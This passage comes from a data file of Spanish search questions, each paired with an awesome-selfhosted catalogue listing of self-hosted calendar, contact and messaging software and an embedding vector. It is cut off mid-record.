"CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Calendar & Contacts: BaΓ―kal β€” Lightweight CalDAV and CardDAV server based on sabre/dav [GPL-3.0, PHP]. DAViCal β€” Server for calendar sharing (CalDAV) that uses a PostgreSQL database as a data store [GPL-2.0, PHP/deb]. Davis β€” A simple, dockerizable and fully translatable admin interface for sabre/dav based on Symfony 5 and Bootstrap 4, largely inspired by BaΓ―kal [MIT, PHP]. Keeper.sh β€” Calendar syncing tool that pulls and pushes events between calendar sources and destinations via iCal/ICS or OAuth, with support for anonymized busy/free events [AGPL-3.0, Docker]. Manage My Damn Life β€” Manage my Damn Life (MMDL) is a self-hosted front end for managing your CalDAV tasks and calendars [GPL-3.0, Nodejs/Docker]. Radicale β€” Simple calendar and contact server with extremely low administrative overhead [GPL-3.0, Python/deb]. SabreDAV β€” Open source CardDAV, CalDAV, and WebDAV framework and server [MIT, PHP]. Xandikos β€” Open source CardDAV and CalDAV server with minimal administrative overhead, backed by a Git repository [GPL-3.0, Python/deb].", "indexar": "hay alguna alternativa gratuita a Google Calendar que se autohospede?", "v": [-0.0468, 0.11051, -0.05806, -0.05775, -0.13034, -0.0762, 0.01164, -0.05834, -0.15969, -0.05123, -0.09872, -0.14819, -0.01727, 0.02945, 0.11582, -0.02546, 0.09022, -0.072, 0.10213, -0.05411, -0.03446, 0.07153, -0.07688, -0.15504, -0.07105, -0.07449, -0.03249, -0.01257, -0.0868, 0.02299, 0.05625, -0.01608, -0.02526, -0.03636, -0.21804, 0.01111, 0.12202, 0.01332, 0.03385, -0.12386, 0.04008, -0.0439, -0.06471, 0.09458, -0.12251, -0.04191, -0.00606, 0.09595, -0.11524, -0.00927, 0.02808, -0.06841, -0.07402, 0.02702, 0.08276, 0.12953, 0.15654, -0.08998, -0.14569, -0.11571, -0.02096, 0.02874, 0.04106, 0.12398, 0.01194, 0.09508, 0.15287, 0.0468, -0.07054, 0.05933, -0.01895, -0.01739, 0.10183, -0.02763, 0.03401, -0.01241, -0.00106, 0.03694, -0.09664, 0.11231, 0.08298, -0.02631, 0.02742, 0.04852, -0.09201, -0.02169, 0.00058, -0.06406, 0.06217, 0.03163, -0.06543, 0.12676, 0.04395, 0.16418, -0.05928, -0.02825, 0.11833, -0.07303, -0.01109, 0.05296, 0.13384, -0.00421, -0.00095, 0.00169, 0.01138, 0.0221, -0.03166, 0.05593, 0.02762, 0.02956, -0.006, -0.01714, -0.05756, -0.0265, 0.08833, 0.04314, 0.09909, 0.09868, 0.00637, -0.03975, -0.0906, 0.09062, -0.06294, -0.02789, -0.05627, 0.09985, 0.01157, 0.0758, -0.04481, 0.00806, 0.04091, -0.10214, -0.00924, -0.0725, -0.09549, 0.09647, 0.00626, -0.03002, 0.00959, 0.04288, 0.05025, -0.01954, 0.04669, -0.09589, 0.00987, -0.07144, 0.01644, 0.00656, -0.01898, -0.08407, -0.08403, -0.05664, 0.02327, 0.07857, 0.03226, 0.02993, -0.05837, -0.00772, 0.0563, -0.02632, -0.00786, -0.09045, -0.00218, 0.05536, -0.06131, 0.03346, 0.04761, -0.01836, -0.07851, 0.03164, 0.02962, 0.08729, 0.05652, -0.06217, 0.00737, 0.02259, 0.07249, 0.0129, 0.02178, 0.03275, -0.00224, 0.00544, -0.03354, -0.02249, -0.03345, -0.07611, -0.07416, 0.02398, 0.01793, -0.04579, -0.03407, 0.00703, -0.02013, 0.00536, 0.05048, -0.01639, -0.03647, -0.07339, -0.04762, 0.02289, -0.05202, -0.03539, -0.00961, 0.01256, -0.07206, -0.03417, 0.06311, 0.06485, -0.00875, 0.05279, 0.00103, 0.02074, 0.00397, -0.06345, 0.01252, 0.01256, 0.03948, 0.03163, 0.01282, -0.05475, 0.06178, -0.04604, 0.01412, -0.0053, -0.0236, 0.05402, 0.06197, -0.02086, -0.02902, -0.04047, 0.06818, -0.01196, 0.00727, 0.01991, 0.00305, 0.00313, -0.01006, 0.02562, 0.03378, 0.02472, 0.0196, 0.00048, 0.04919, 0.04917, -0.04172, -0.0059, -0.00735, -0.06432, 0.02489, -0.00501, -0.04137, 0.02867, -0.01465, 0.02694, 0.03044, 0.0506]} -{"tipo": "pregunta", "herramienta": "Calendar & Contacts", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Calendar & Contacts", "tema": "calendar & contacts", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Calendar & Contacts: BaΓ―kal β€” Lightweight CalDAV and CardDAV server based on sabre/dav [GPL-3.0, PHP]. DAViCal β€” Server for calendar sharing (CalDAV) that uses a PostgreSQL database as a data store [GPL-2.0, PHP/deb]. Davis β€” A simple, dockerizable and fully translatable admin interface for sabre/dav based on Symfony 5 and Bootstrap 4, largely inspired by BaΓ―kal [MIT, PHP]. Keeper.sh β€” Calendar syncing tool that pulls and pushes events between calendar sources and destinations via iCal/ICS or OAuth, with support for anonymized busy/free events [AGPL-3.0, Docker]. Manage My Damn Life β€” Manage my Damn Life (MMDL) is a self-hosted front end for managing your CalDAV tasks and calendars [GPL-3.0, Nodejs/Docker]. Radicale β€” Simple calendar and contact server with extremely low administrative overhead [GPL-3.0, Python/deb]. SabreDAV β€” Open source CardDAV, CalDAV, and WebDAV framework and server [MIT, PHP]. Xandikos β€” Open source CardDAV and CalDAV server with minimal administrative overhead, backed by a Git repository [GPL-3.0, Python/deb].", "indexar": "con quΓ© programa puedo sincronizar eventos entre diferentes fuentes de calendario sin pagar", "v": [-0.11158, 0.04789, -0.078, -0.14065, 0.01378, -0.09689, 0.11161, -0.0278, -0.13037, -0.13526, -0.03465, -0.02419, -0.0016, -0.08682, 0.00049, 0.10137, 0.02635, -0.03433, 0.13959, 0.05239, -0.03059, -0.04673, 0.04071, -0.15672, -0.12196, -0.00624, 0.03919, 0.00901, -0.06497, -0.0161, -0.01432, -0.01079, 0.15257, -0.03796, 0.04685, 0.00766, 0.07874, 0.14087, -0.16241, -0.11476, -0.08351, -0.00988, -0.01279, -0.00588, -0.02742, -0.06514, -0.00538, 0.12425, -0.00297, -0.12771, -0.00068, 0.00325, 0.01066, -0.00651, 0.00504, -0.08743, -0.0802, -0.13188, -0.01394, 0.03305, 0.04631, 0.07183, -0.04761, -0.03112, 0.03828, 0.09003, 0.03256, 0.02098, 0.03817, 0.02135, -0.02474, -0.10231, 0.06051, -0.00974, -0.00078, -0.03403, 0.06776, -0.01485, -0.1003, 0.06883, -0.08027, 0.05949, 0.06387, 0.13047, -0.10525, 0.02701, 0.08475, 0.05503, 0.03265, 0.01824, 0.00928, 0.18386, 0.04505, 0.07942, 0.00427, -0.06787, 0.09892, -0.0754, -0.06191, 0.02431, -0.00522, -0.04207, -0.0861, -0.00243, -0.03205, 0.05948, 0.10209, 0.08104, 0.04282, 0.04963, -0.06623, -0.00928, -0.08122, -0.04445, -0.11556, 0.08585, 0.10019, 0.01254, 0.04879, -0.04048, -0.05364, 0.02204, -0.00902, 0.01344, 0.11572, 0.04654, 0.08691, 0.17521, 0.00502, 0.05615, -0.00188, 0.04013, 0.01723, -0.02089, -0.01631, -0.11951, -0.04827, -0.04129, 0.04215, -0.0195, 0.01789, 0.02089, 0.07375, 0.06431, 0.05929, -0.05889, -0.0272, -0.08662, -0.13157, 0.00938, -0.02475, 0.01404, -0.0093, 0.03261, -0.14204, -0.07596, -0.04698, 0.02352, -0.01372, -0.02242, -0.06232, -0.01045, -0.03234, -0.05134, 0.08898, -0.06951, -0.03627, -0.03901, -0.01114, 0.11845, 0.01123, 0.12362, 0.09745, -0.04254, -0.0254, -0.07179, -0.00491, -0.11204, -0.00053, -0.00766, -0.09575, 0.09167, 0.01962, -0.02036, -0.01526, -0.06186, -0.00231, 0.06032, 0.02533, 0.00596, -0.01606, 0.01572, 0.04419, -0.03775, 0.03893, -0.02338, 0.00558, -0.03822, -0.02711, -0.04113, -0.01344, 0.03126, 0.06631, 0.05646, 0.08207, 0.05665, -0.07754, 0.07837, 0.01864, 0.08209, 0.03257, 0.00083, 0.06899, 0.00813, -0.01908, -0.01801, -0.01625, 0.01293, 0.10262, -0.0189, 0.03377, 0.00268, -0.00287, 0.00911, -0.04761, -0.07902, 0.04156, -0.01857, 0.05887, 0.01987, -0.03718, 0.0094, -0.01777, 0.00488, 0.0062, 0.01216, -0.00363, 0.01807, 0.04092, -0.01875, -0.04543, 0.03773, 0.02681, -0.02624, -0.03745, -0.01689, -0.05082, -0.04695, -0.00914, 0.00876, 0.03627, 0.04599, 0.05464, -0.01679, 0.0306, 0.04121]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: AnyCable β€” Realtime server for reliable two-way communication over WebSockets, Server-sent events, etc [MIT, Go/Docker]. Apprise β€” Apprise allows you to send a notification to almost all of the most popular notification services available to us today such as: Telegram, Discord, Slack, Amazon SNS, Gotify, etc [MIT, Python/Docker/deb]. Centrifugo β€” Language-agnostic real-time messaging (Websocket or SockJS) server [MIT, Go/Docker/K8S]. Chitchatter β€” Peer-to-peer chat app that is serverless, decentralized, and ephemeral [GPL-2.0, Nodejs]. Conduit β€” A simple, fast, and reliable chat server powered by Matrix [Apache-2.0, Rust]. Continuwuity β€” Community-driven Matrix homeserver, the continuation of conduwuit focusing on user experience and new features (fork of Conduit) [Apache-2.0, Rust/Docker/K8S/deb]. Databag β€” Federated, end-to-end encrypted messaging service for the web, iOS, and Android, supporting text, photos, video, and WebRTC video and audio calls [Apache-2.0, Docker].", "indexar": "cual es una alternativa libre a WhatsApp o Telegram para chatear de forma encriptada?", "v": [-0.05149, 0.01942, -0.08592, 0.01975, -0.0857, -0.08174, -0.01465, 0.11033, 0.03964, 0.04516, -0.08069, -0.14344, -0.00066, 0.02775, 0.02562, 0.04557, 0.01311, -0.12574, 0.18812, -0.06225, 0.02929, -0.0785, -0.03694, -0.13209, -0.09226, -0.0248, -0.04318, 0.05924, -0.07722, 0.08626, 0.06567, -0.05788, 0.06183, 0.05575, 0.02012, 0.13419, 0.0539, -0.00358, -0.07773, 0.12379, 0.02262, -0.02931, 0.01501, 0.11848, -0.00325, 0.03261, -0.10083, -0.01376, 0.08136, -0.00046, -0.04823, -0.05262, -0.0432, 0.15126, -0.00744, 0.03273, 0.20074, -0.12051, 0.01467, -0.01994, -0.05962, 0.08087, 0.01763, 0.01946, 0.08119, 0.00033, -0.13296, 0.06893, -0.07099, 0.12572, 0.11408, 0.02945, -0.10155, 0.1282, 0.02495, 0.11022, -0.1872, 0.02518, -0.03704, 0.08131, 0.04058, -0.06749, 0.11461, 0.01072, -0.08631, -0.02815, 0.06217, 0.02641, -0.02865, 0.03046, 0.05312, 0.09469, 0.00976, 0.15354, 0.01119, -0.0878, -0.05533, -0.00604, -0.00712, 0.0505, 0.10564, -0.02774, -0.09575, 0.04309, -0.02107, -0.03512, -0.04346, -0.03259, 0.03289, -0.03511, -0.00331, 0.03905, 0.04011, 0.12724, -0.05824, -0.09184, 0.01108, -0.02307, 0.0524, -0.0382, -0.05166, -0.01305, -0.04211, -0.02847, 0.04513, 0.08196, -0.07825, 0.06817, -0.0151, 0.02949, 0.00231, -0.03969, -0.15106, -0.04841, -0.06567, 0.10448, 0.03395, 0.01581, 0.03782, 0.02172, 0.03164, 0.02359, 0.01977, -0.07053, 0.07126, 0.05821, -0.00058, -0.14399, -0.06565, 0.07457, 0.01811, 0.06066, -0.046, 0.07484, -0.04899, -0.04809, -0.02446, -0.08748, -0.01294, 0.14319, -0.00174, -0.03259, 0.04307, 0.0425, -0.01901, -0.03071, 0.07696, -0.00812, -0.03359, -0.06092, 0.02093, 0.01789, 0.10427, -0.09661, 0.01225, -0.05169, 0.02064, -0.02165, 0.06209, -0.08931, -0.00891, 0.01191, -0.01022, -0.0113, 0.00968, 0.01269, -0.07318, 0.00528, -0.01656, 0.02572, -0.07499, 0.02055, -0.08902, -0.0133, -0.02838, 0.03331, -0.03366, -0.02663, 0.02988, -0.05098, -0.06279, -0.00226, 0.02414, 0.03149, -0.02005, 0.02873, -0.01574, -0.02997, -0.00643, 0.05851, 0.01553, -0.03912, 0.03316, 0.03419, -0.01282, -0.01052, 0.05107, -0.03215, -0.00542, 0.00829, -0.0097, 0.02451, 0.09517, -0.03358, 0.04393, 0.01037, -0.0347, 0.05565, -0.02684, 0.02655, 0.01854, 0.00823, -0.01733, 0.00642, 0.09706, -0.03892, -0.00524, -0.01061, -0.04333, -0.08202, 0.00334, 0.05099, 0.00458, -0.01072, -0.03913, 0.00645, -0.11306, 0.03658, -0.02647, -0.05026, -0.00334, 0.01097, 0.0519, -0.05783, 0.06291, -0.02925]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: AnyCable β€” Realtime server for reliable two-way communication over WebSockets, Server-sent events, etc [MIT, Go/Docker]. Apprise β€” Apprise allows you to send a notification to almost all of the most popular notification services available to us today such as: Telegram, Discord, Slack, Amazon SNS, Gotify, etc [MIT, Python/Docker/deb]. Centrifugo β€” Language-agnostic real-time messaging (Websocket or SockJS) server [MIT, Go/Docker/K8S]. Chitchatter β€” Peer-to-peer chat app that is serverless, decentralized, and ephemeral [GPL-2.0, Nodejs]. Conduit β€” A simple, fast, and reliable chat server powered by Matrix [Apache-2.0, Rust]. Continuwuity β€” Community-driven Matrix homeserver, the continuation of conduwuit focusing on user experience and new features (fork of Conduit) [Apache-2.0, Rust/Docker/K8S/deb]. Databag β€” Federated, end-to-end encrypted messaging service for the web, iOS, and Android, supporting text, photos, video, and WebRTC video and audio calls [Apache-2.0, Docker].", "indexar": "con que puedo montar un servidor de mensajerΓ­a en tiempo real sin usar servicios externos?", "v": [0.06426, 0.08498, -0.18288, -0.10029, -0.15373, -0.07366, -0.06097, -0.06058, -0.00061, -0.09905, -0.13084, -0.07151, 0.13959, -0.07083, 0.00025, 0.08789, 0.18371, -0.01391, 0.08767, 0.03226, 0.08164, -0.04171, -0.03742, -0.03937, -0.07551, 0.08428, 0.0812, -0.11632, -0.11835, 0.05635, 0.05426, 0.00032, 0.10714, -0.03983, -0.00922, -0.08091, 0.05063, 0.10395, -0.01913, 0.03615, 0.17473, -0.00162, -0.03199, 0.05475, -0.02647, -0.01368, 0.04609, -0.07808, -0.03162, 0.01846, -0.00463, -0.09073, -0.1715, 0.02244, -0.08933, -0.02929, 0.17562, -0.10813, 0.03719, -0.10651, -0.08517, 0.09744, -0.05007, 0.05421, 0.10256, -0.0423, -0.02096, -0.03006, -0.14854, -0.07067, -0.06156, -0.04883, 0.00873, -0.00727, 0.00596, 0.0562, -0.07905, 0.02743, -0.01072, 0.105, 0.0335, 0.00347, 0.00236, 0.08126, -0.08489, -0.10538, 0.01571, -0.0828, 0.06397, -0.01764, 0.09608, 0.13833, -0.06192, 0.022, -0.00939, -0.03383, -0.00268, -0.07338, 0.00127, 0.0573, 0.0991, 0.02758, -0.00255, 0.11108, 0.03621, 0.00875, 0.08983, -0.1233, 0.08435, -0.03443, 0.02839, -0.05207, -0.053, -0.02616, -0.05411, -0.13795, 0.03075, -0.03048, -0.0099, -0.00104, -0.07471, 0.01799, 0.09017, 0.04593, 0.0331, -0.00971, 0.05843, -0.0471, -0.01916, -0.02725, -0.02844, -0.0884, -0.07351, -0.05457, -0.02872, 0.01435, 0.01151, -0.01544, 0.02371, 0.01821, 0.00137, 0.01045, -0.08908, -0.04836, 0.03123, 0.06883, 0.00802, -0.14743, -0.0675, 0.00663, 0.11088, 0.00392, -0.04075, 0.0249, -0.082, -0.05639, 0.0185, -0.02677, -0.05824, 0.09375, 0.03141, 0.04575, 0.00231, 0.07866, 0.02786, -0.06672, 0.03792, 0.08031, 0.05675, 0.06192, -0.04052, 0.03376, 0.05564, -0.05154, -0.00866, 0.04786, -0.06598, -0.01392, -0.02971, -0.02455, 3e-05, 0.00126, 0.00284, 0.00558, -0.01233, 0.02586, -0.01713, 0.01346, -0.02076, 0.00218, 0.02598, 0.00966, -0.00963, 0.09224, 0.00452, -0.05419, -0.0278, -0.03999, -0.01717, -0.06141, -0.01701, -0.07356, -0.01158, -0.02624, -0.03709, 0.00617, -0.06508, 0.09985, 0.00573, 0.04167, 0.01088, -0.01149, 0.0902, -0.04487, 0.0005, 0.01005, 0.08812, -0.07308, -0.01752, 0.01894, -0.04286, 0.00253, 0.00018, -0.03005, -0.0329, 0.06844, 0.03165, 0.04197, 0.04317, 0.02474, -0.06899, 0.0468, -0.058, 0.00258, 0.04486, -0.06306, 0.04067, -0.05384, -0.02409, -0.08468, 0.00366, 0.05187, -0.01897, 0.01434, -0.00724, -0.02731, -0.06792, -0.02093, -0.0611, -0.03787, -0.02082, -0.00144, 0.02451, -0.02383, 0.01861, -0.02246]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: AnyCable β€” Realtime server for reliable two-way communication over WebSockets, Server-sent events, etc [MIT, Go/Docker]. Apprise β€” Apprise allows you to send a notification to almost all of the most popular notification services available to us today such as: Telegram, Discord, Slack, Amazon SNS, Gotify, etc [MIT, Python/Docker/deb]. Centrifugo β€” Language-agnostic real-time messaging (Websocket or SockJS) server [MIT, Go/Docker/K8S]. Chitchatter β€” Peer-to-peer chat app that is serverless, decentralized, and ephemeral [GPL-2.0, Nodejs]. Conduit β€” A simple, fast, and reliable chat server powered by Matrix [Apache-2.0, Rust]. Continuwuity β€” Community-driven Matrix homeserver, the continuation of conduwuit focusing on user experience and new features (fork of Conduit) [Apache-2.0, Rust/Docker/K8S/deb]. Databag β€” Federated, end-to-end encrypted messaging service for the web, iOS, and Android, supporting text, photos, video, and WebRTC video and audio calls [Apache-2.0, Docker].", "indexar": "que programa sirve para notificaciones y mensajes instantΓ‘neos entre diferentes plataformas?", "v": [0.15999, 0.22575, -0.09806, -0.11321, 0.0696, -0.15301, -0.07562, -0.12126, -0.02286, -0.06263, 0.01908, -0.03161, 0.0417, 0.01412, -0.04118, 0.11842, 0.11988, 0.00657, 0.03979, 0.03473, 0.00839, -0.00523, -0.07781, -0.05885, -0.05788, 0.02516, 0.01576, 0.03098, -0.06675, -0.01161, 0.05028, -0.07954, 0.10559, -0.07833, -0.05063, -0.03796, 0.04997, 0.05454, -0.05618, 0.02591, 0.05009, 0.0071, -0.04823, -0.07309, 0.06109, -0.05778, -0.02078, 0.10213, 0.07755, -0.04401, -0.04083, -0.03141, -0.09984, 0.09836, -0.05316, -0.03517, 0.21053, -0.09003, -0.00058, -0.01862, -0.0367, -0.00368, 0.01567, -0.06646, 0.04794, 0.01408, 0.11203, 0.02611, -0.07989, 0.01597, -0.01839, 0.02325, 0.05063, 0.03414, 0.06077, 0.14229, -0.14477, 0.05222, -0.0518, 0.00032, 0.05775, -0.04653, -0.04187, 0.07505, -0.04807, -0.03697, 0.00408, -0.05435, -0.04588, -0.07776, 0.08337, 0.04702, 0.02733, 0.11602, 0.07677, -0.02894, 0.02433, -0.02686, 0.01305, 0.10713, 0.01536, -0.07409, -0.08472, 0.04423, -0.11401, 0.05558, 0.0432, -0.1179, 0.02694, 0.02664, 0.0147, -0.09232, 0.02673, -0.0553, -0.03763, 0.02019, -0.04995, -0.07358, 0.11197, 0.04345, -0.07814, 0.04039, 0.07621, 0.02805, 0.05874, -0.01217, -0.07849, 0.0339, 0.01927, 0.12939, -0.01982, -0.03135, -0.08342, -0.06786, -0.03523, 0.01453, 0.01748, 0.04159, 0.02342, -0.06135, 0.06456, 0.13079, 0.02243, -0.0159, 0.03441, 0.01317, -0.05602, -0.14878, -0.01555, 0.07592, 0.06158, 0.01051, -0.04126, -0.00864, -0.0334, -0.08941, -0.03417, -0.02846, -0.0655, 0.08212, -0.0655, -0.00096, -0.0151, -0.00311, 0.04545, -0.06984, -0.02612, 0.09461, 0.07134, 0.07528, -0.03044, 0.05666, 0.08996, -0.09681, -0.06459, -0.03103, 0.02141, 0.00754, -0.00518, -0.04181, -0.09687, 0.06695, -0.02509, 0.02078, -0.01145, -0.06086, -0.05459, 0.01567, 0.05824, 0.13374, -0.03704, 0.03947, -0.05846, 0.01061, -0.02073, -0.05685, -0.05207, -0.05255, 0.04427, -0.03139, -0.06365, -0.02856, -0.03605, -0.03854, -0.03565, 0.06334, -0.05184, -0.00363, 0.02269, 0.0815, 0.00551, -0.06825, 0.08974, -0.00348, -0.06225, -0.03334, 0.09315, -0.04548, 0.02155, 0.0355, 0.01898, 0.03907, 0.00519, -0.04286, -0.05259, 0.06792, 0.04217, 0.05478, 0.05481, 0.04804, -0.04038, 0.03519, -0.03159, -0.01288, 0.08248, -0.03223, 0.00421, -0.05166, -0.06508, -0.09103, -0.00056, 0.04741, 0.05405, -0.00719, 0.00076, -0.03693, -0.06456, 0.02622, -0.01019, -0.03185, -0.04196, 0.05077, 0.07546, -0.03832, 0.0499, -0.05086]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Element β€” Fully-featured Matrix client for Web, iOS & Android [Apache-2.0, Nodejs]. GlobaLeaks β€” Whistleblowing software enabling anyone to easily set up and maintain a secure reporting platform [AGPL-3.0, Python/deb/Docker]. GNUnet β€” Software framework for decentralized, peer-to-peer networking [GPL-3.0, C]. Gotify β€” Notification server with Android and CLI clients (alternative to PushBullet) [MIT, Go/Docker]. Hyphanet β€” Anonymously share files, browse and publish _freesites_ (web sites accessible only through Hyphanet) and chat on forums [GPL-2.0, Java]. Jami β€” Universal communication platform which preserves the user's privacy and freedoms [GPL-3.0, C++]. Live Helper Chat β€” Live Support chat for your website [Apache-2.0, PHP]. Mumble β€” Low-latency, high quality voice/text chat software [BSD-3-Clause, C++/deb]. Notifo β€” Multichannel notification server with support for Email, Mobile Push, Web Push, SMS, messaging and a javascript plugin [MIT, C#].", "indexar": "cuales son los programas de mensajerΓ­a que funcionan sin necesidad de servidores propios?", "v": [0.0699, 0.09072, -0.01846, -0.13129, -0.01426, -0.10446, 0.06041, -0.12354, -0.03394, -0.0655, -0.04748, 0.06391, 0.08011, -0.13922, 0.0135, 0.03846, 0.13806, -0.01839, 0.07923, 0.09609, 0.0078, 0.00706, 0.01051, -0.01571, -0.17896, 0.13175, 0.12103, -0.11716, -0.07632, 0.10118, 0.11473, -0.06251, 0.16011, -0.10009, -0.01031, 0.06066, -0.07641, 0.09794, -0.04273, 0.15105, 0.09704, 0.01271, -0.08287, 0.02423, 0.00872, 0.00676, 0.0138, -0.03768, 0.02794, -0.02636, -0.12224, 0.00078, -0.04529, 0.002, -0.03177, -0.0891, 0.06842, -0.03978, 0.01931, -0.00995, -0.13038, 0.10269, -0.00213, -0.00134, 0.07545, -0.06297, 0.0382, -0.07642, -0.14027, -0.03387, -0.03211, 0.01172, -0.07438, 0.01119, -0.02075, 0.09759, -0.1315, 0.03595, 0.01788, 0.11405, 0.08895, 0.00235, -0.00534, 0.01771, -0.0674, -0.07909, 0.01826, 0.00259, 0.04158, -0.04022, 0.05545, 0.09076, -0.03813, 0.12116, 0.02055, -0.01645, 0.03415, -0.08231, 0.08077, 0.1343, 0.08836, -0.07071, -0.03396, 0.07492, -0.05666, 0.07434, 0.09878, -0.10772, 0.0913, -0.0028, 0.02083, -0.09949, 0.06273, 0.00738, -0.06734, -0.09243, -0.01792, -0.06398, 0.03486, -0.033, -0.14088, 0.04031, 0.05718, 0.00092, 0.06018, 0.01163, 0.04589, 0.026, 0.0381, 0.02079, 0.02708, -0.08489, -0.05556, -0.03504, -0.04588, -0.0548, 0.04193, 0.0146, 0.01395, -0.01922, 0.00346, 0.0537, -0.00749, -0.01344, 0.08597, 0.06025, 0.02505, -0.12632, -0.04223, 0.01352, 0.04406, 0.00261, -0.03063, 0.00168, -0.07194, -0.00674, 0.02393, -0.04395, -0.06778, 0.07231, 0.0021, 0.00318, -0.04194, 0.09383, 0.05478, -0.03628, -0.02149, 0.09569, 0.06753, 0.08141, -0.04718, -0.01392, 0.04563, -0.02632, -0.07805, -0.01064, -0.05825, 0.01215, 0.05791, -0.03683, -0.00901, 0.09707, 0.04521, 0.00048, -0.00446, -0.04147, -0.06912, -0.04034, 0.02298, 0.04449, 0.04541, 0.01615, -0.08864, 0.00723, -0.02671, -0.02468, -0.09663, -0.01324, 0.04227, -0.03754, -0.00438, -0.06567, -0.04696, -0.00774, -0.01885, 0.04407, -0.07704, 0.04274, -0.0247, 0.07906, 0.02528, -0.03455, 0.05378, -0.035, -0.0071, -0.01246, 0.0868, -0.07117, 0.03891, 0.0448, 0.00136, -0.01688, 0.01985, -0.03914, -0.03575, 0.04005, 0.00941, 0.06132, 0.09089, 0.02008, -0.04177, 0.06413, -0.05767, 0.00227, 0.05262, -0.03381, 0.0151, -0.0807, -0.00319, -0.12081, -0.01003, 0.06749, 0.00777, -0.02847, -0.00381, -0.06825, -0.07912, 0.00284, -0.05732, -0.00364, -0.02578, 0.02401, 0.017, 0.02036, 0.03794, -0.05284]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Element β€” Fully-featured Matrix client for Web, iOS & Android [Apache-2.0, Nodejs]. GlobaLeaks β€” Whistleblowing software enabling anyone to easily set up and maintain a secure reporting platform [AGPL-3.0, Python/deb/Docker]. GNUnet β€” Software framework for decentralized, peer-to-peer networking [GPL-3.0, C]. Gotify β€” Notification server with Android and CLI clients (alternative to PushBullet) [MIT, Go/Docker]. Hyphanet β€” Anonymously share files, browse and publish _freesites_ (web sites accessible only through Hyphanet) and chat on forums [GPL-2.0, Java]. Jami β€” Universal communication platform which preserves the user's privacy and freedoms [GPL-3.0, C++]. Live Helper Chat β€” Live Support chat for your website [Apache-2.0, PHP]. Mumble β€” Low-latency, high quality voice/text chat software [BSD-3-Clause, C++/deb]. Notifo β€” Multichannel notification server with support for Email, Mobile Push, Web Push, SMS, messaging and a javascript plugin [MIT, C#].", "indexar": "ΒΏquΓ© software puedo usar para notificaciones en tiempo real y reemplazar servicios como PushBullet?", "v": [-0.09956, 0.14406, -0.15087, -0.08563, 0.06575, -0.08897, -0.10078, -0.16349, -0.04881, -0.16522, -0.15908, -0.13441, 0.05086, 0.02368, -0.11667, -0.02103, -0.04291, -0.13239, 0.00131, 0.06593, 0.02576, -0.10193, -0.17576, 0.02966, -0.0926, 0.1388, 0.10034, 0.01469, -0.11436, 0.0556, 0.03158, -0.06056, 0.01769, -0.07195, -0.07682, 0.06217, 0.09874, 0.04202, 0.07206, -0.05036, 0.14968, 0.03455, -0.01519, 0.0534, 0.07879, 0.00557, 0.0408, -0.02261, -0.00954, 0.00208, -0.05698, -0.04183, -0.14217, 0.05262, 0.01575, -0.06352, 0.2137, -0.07986, -0.03299, -0.06353, -0.07729, -0.01156, -0.0593, 0.06423, 0.05701, -0.03833, 0.00829, -0.01682, -0.0765, 0.00948, -0.09047, -0.08273, 0.09099, 0.00675, 0.03156, 0.0721, -0.08606, 0.00648, -0.0041, 0.02389, -0.01498, 0.00296, -0.00561, 0.07654, -0.09998, -0.02524, 0.0769, -0.09284, -0.08473, -0.04537, 0.08092, 0.1094, 0.01496, 0.09806, 0.01005, 0.06289, -0.00087, -0.09047, -0.02035, 0.03495, 0.00295, -0.02554, -0.06221, 0.02426, -0.0635, -0.05538, 0.03021, -0.09392, -0.02184, -0.07723, -0.0598, -0.0641, -0.05702, -0.02263, 0.01223, 0.01248, 0.03712, -0.14036, 0.04706, -0.00234, 0.00467, 0.00026, -0.00621, -0.06144, 0.06595, -0.05111, -0.01195, 0.0551, -0.00871, 0.03957, 0.02396, -0.02745, -0.10132, -0.02681, -0.02973, 0.00442, 0.04662, 0.02964, 0.12426, -0.03334, 0.04037, 0.04203, -3e-05, 0.00922, 0.02068, 0.04133, -0.04903, -0.02078, -0.01183, 0.01596, 0.05702, -0.01361, 0.00428, 0.05592, -0.02816, -0.02926, 0.02348, -0.02758, -0.05283, 0.01398, -0.099, 0.05988, -0.01116, -0.0515, -0.00012, -0.07369, 0.02198, 0.05427, 0.09033, 0.05583, 0.0137, 0.10244, 0.04709, -0.06205, -0.06146, -0.05955, -0.0154, -0.02045, 0.02098, -0.06312, -0.00628, 0.03798, -0.01255, 0.02465, 0.04623, -0.02588, -0.01616, 0.05342, 0.00372, 0.07092, -0.05233, 0.02205, 0.06664, -0.03006, 0.00876, -0.00619, -0.01184, -0.0502, -0.06073, -0.06696, -0.06121, -0.03846, -0.05441, -0.01499, 0.01733, 0.03693, -0.00916, 0.056, -0.04822, 0.09342, -0.01732, 0.00689, 0.10676, 0.04168, -0.0892, -0.05483, 0.05094, -0.04847, 0.00136, 0.01194, 